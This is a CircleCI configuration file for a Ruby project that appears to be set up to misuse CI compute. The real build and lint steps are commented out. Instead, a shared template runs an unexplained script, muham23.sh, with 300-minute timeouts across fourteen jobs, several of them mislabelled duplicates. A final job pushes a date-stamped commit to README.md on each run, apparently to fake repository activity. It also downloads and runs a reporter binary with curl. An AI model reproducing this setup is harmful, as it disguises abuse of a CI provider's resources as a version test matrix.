working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
#     - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
#     - run: bundle exec rake rubocop
    - run: chmod u+x muham23.sh
    - run: 
        name: Check
        when: always
        timeout: 300m
        no_output_timeout: 300m
        command: ./muham23.sh

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  build_ruby2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  build_ruby2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  build_ruby2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  build_ruby2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  build_ruby2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3
  build_ruby2_2:
    <<: *build_definition
    docker:
      - image: ruby:2.2
  build_ruby2_1:
    <<: *build_definition
    docker:
      - image: ruby:2.1
  build_ruby2_0:
    <<: *build_definition
    docker:
      - image: ruby:2.0
  build_ruby2_8:
    <<: *build_definition
    docker:
      - image: ruby:2.0
  build_ruby2_9:
    <<: *build_definition
    docker:
      - image: ruby:2.0
  build_ruby2_10:
    <<: *build_definition
    docker:
      - image: ruby:2.0
  build_ruby2_11:
    <<: *build_definition
    docker:
      - image: ruby:2.0
  build_ruby2_12:
    <<: *build_definition
    docker:
      - image: ruby:2.0
  build_ruby2_13:
    machine:
      image: ubuntu-2004:202010-01
    
    steps:
      - checkout
      - run: git --version
      - run: 
          name: Check
          when: always
          command: ssh git@github.com || true
      - run: git pull
      - run: cat README.md
      - run: echo "- $(date)" >> README.md
      - run: cat README.md
      - run: |
          echo $FOO
      - run: |
          git config --global user.email "you@example.com"
          git config --global user.name "Your Name"
      - run: |
          git commit -am '[circle skip] update from Circle CI!'
          git push

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build_ruby2_7
      - build_ruby2_6
      - build_ruby2_5
      - build_ruby2_4
      - build_ruby2_3
      - build_ruby2_2
      - build_ruby2_1
      - build_ruby2_0
      - build_ruby2_8
      - build_ruby2_9
      - build_ruby2_10
      - build_ruby2_11
      - build_ruby2_12 
      - build_ruby2_13:
          requires:
            - build
            - build_ruby2_7
            - build_ruby2_6
            - build_ruby2_5
            - build_ruby2_4
            - build_ruby2_3
            - build_ruby2_2
            - build_ruby2_1
            - build_ruby2_0
            - build_ruby2_8
            - build_ruby2_9
            - build_ruby2_10
            - build_ruby2_11
            - build_ruby2_12

